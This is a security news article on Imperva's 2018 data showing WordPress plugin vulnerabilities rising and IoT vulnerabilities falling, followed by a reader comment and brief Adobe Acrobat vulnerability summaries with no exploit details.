This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Web Vulnerabilities Up, IoT Flaws Down

The number of flaws found in WordPress and its associated plugins have tripled since 2017, while Internet of Things vulnerabilities dropped significantly, according to data collected by Imperva.

The total number of vulnerabilities in Web applications reported by researchers jumped to 17,142 in 2018, climbing more than 21% compared to the previous year and driven in part by the large number of flaws found in Web applications and application programming interfaces.

Popular content management system (CMS) WordPress had the most reported vulnerabilities, with 542. WordPress has a large ecosystem that includes more than 54,000 plug-ins: those same third-party plugins accounted for almost all—98%—of the Web security issues found by researchers last year, according to Web security firm Imperva, which published its findings in a report this week.

That popularity and extensibility makes WordPress popular with Web developers but also with online attackers, says Nadav Avital, research manager for threat analytics at Imperva.

"These make WordPress a lucrative asset that many hackers set their eyes upon—any security hole they may be able to find and exploit can lead to a mass infection," he says.

On the Rise

According to the National Vulnerability Database, the number of publicly disclosed overall vulnerabilities (not just in Web apps) jumped significantly in 2017, jumping more than 127% to 14,649 disclosed issues, after more than a decade of varying between 5,000 and 8,000 annual reports. Increases in the development of online applications, the use of open-source components, and more rigorous security testing are all likely contributing factors for the increase.

"It is somewhat expected that the overall number of vulnerabilities rises year after year," Imperva's Avital says. "Each year there are more products—new and legacy—to check and more sophisticated tools to check them with."

"We definitely see a lot of growth in terms of the number of vulnerabilities associated with modern applications," said David Habusha, vice president of products at WhiteSource. "The attackers are focused on front-end facing Web servers, content management platforms, and Internet of Things."

While WordPress accounted for more than 500 vulnerabilities, another content management system, Drupal, had two of the most attacked vulnerabilities, Imperva found.

In terms of vulnerability classes, however, issues that allow commands to be run via another application—often referred to as injection attacks—accounted for 3,294 flaws, according to the report. Remote command execution accounted for the largest portion of vulnerabilities, with 1,980.

IoT Vulns Dropped

While Web applications appear to be increasingly targeted, another major focus of vulnerability research—the Internet of Things—appeared to fare pretty well in 2018, according to the Imperva report. The number of vulnerabilities found in IoT devices and software fell to its lowest level in three years.

The increasing interest in in developing security standards and best practices has likely prompted vendors to invest more in security, Imperva's Avital says.

"While fewer vulnerabilities were found in IoT products, it does not mean that IoT is safe from cyberattackers," he says. "While new IoT products may be more secure, many IoT vendors still don't push security updates and if they did, it isn't clear how to update or if they can even be deployed as some devices cannot be taken offline."

Companies need to automate both their scanning for vulnerabilities and use agile develop methodologies to fix security issues as early in the software-development cycle as possible, says Dan Cornell, chief technology officer for the Denim Group, a software-security firm.

"I think we are still at the saturation point, where organizations have a much greater focus on the detection of vulnerabilities over the remediation od vulnerabilities," Cornell says. "People are still doing a lot of testing, but they still are not fixing enough."

To fix vulnerabilities and reduce the number of issues that actually make it in production, code-checking software can help developers take a greater role in securing the software as it is written.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline ... View Full Bio

This is a sinkhole of a web page provider - almost all of our internet page issues come from Webpress sponsored sites and I really think it should be avoided whenever possible if not just abolished entirely. There is no trust in their controls and/or features. Assume if you sponsor through this one, your data will be hacked in short order.

As cyber threats grow, many organizations are building security operations centers (SOCs) to improve their defenses. In this Tech Digest you will learn tips on how to get the most out of a SOC in your organization - and what to do if you can't afford to build one.

Adobe Acrobat and Reader versions 2019.010.20069 and earlier, 2019.010.20069 and earlier, 2017.011.30113 and earlier version, and 2015.006.30464 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution .

Adobe Acrobat and Reader versions 2019.010.20069 and earlier, 2019.010.20069 and earlier, 2017.011.30113 and earlier version, and 2015.006.30464 and earlier have a type confusion vulnerability. Successful exploitation could lead to arbitrary code execution .

Adobe Acrobat and Reader versions 2019.010.20069 and earlier, 2019.010.20069 and earlier, 2017.011.30113 and earlier version, and 2015.006.30464 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution .

Adobe Acrobat and Reader versions 2019.010.20069 and earlier, 2019.010.20069 and earlier, 2017.011.30113 and earlier version, and 2015.006.30464 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.

Adobe Acrobat and Reader versions 2019.010.20069 and earlier, 2019.010.20069 and earlier, 2017.011.30113 and earlier version, and 2015.006.30464 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution .